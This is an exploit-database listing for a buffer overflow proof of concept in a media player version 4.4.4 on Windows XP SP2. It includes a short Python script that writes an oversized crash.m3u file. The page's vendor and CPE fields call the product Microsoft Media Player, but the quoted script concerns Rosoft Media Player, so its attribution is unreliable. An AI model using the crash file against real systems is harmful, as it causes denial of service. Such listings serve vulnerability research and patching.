header-logo
Suggest Exploit
vendor:
Media Player
by:
N/A
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Media Player
Affected Version From: 4.4.4
Affected Version To: 4.4.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:microsoft:media_player:4.4.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
N/A

Microsoft media player 4.4.4 SEH buffer overflow POC

A buffer overflow vulnerability exists in Microsoft Media Player 4.4.4. An attacker can exploit this vulnerability by sending a specially crafted .m3u file containing a large amount of data, resulting in a denial of service condition or the execution of arbitrary code. This vulnerability affects Windows XP SP2.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Microsoft Media Player.
Source

Exploit-DB raw data:

#rosoft media player 4.4.4 SEH buffer overflow POC
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html
#tested on XP SP2

#!/usr/bin/python

filename = "crash.m3u"


junk = "\x41" * 4500

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()

Navigation

Suggest Exploit

Services By CQR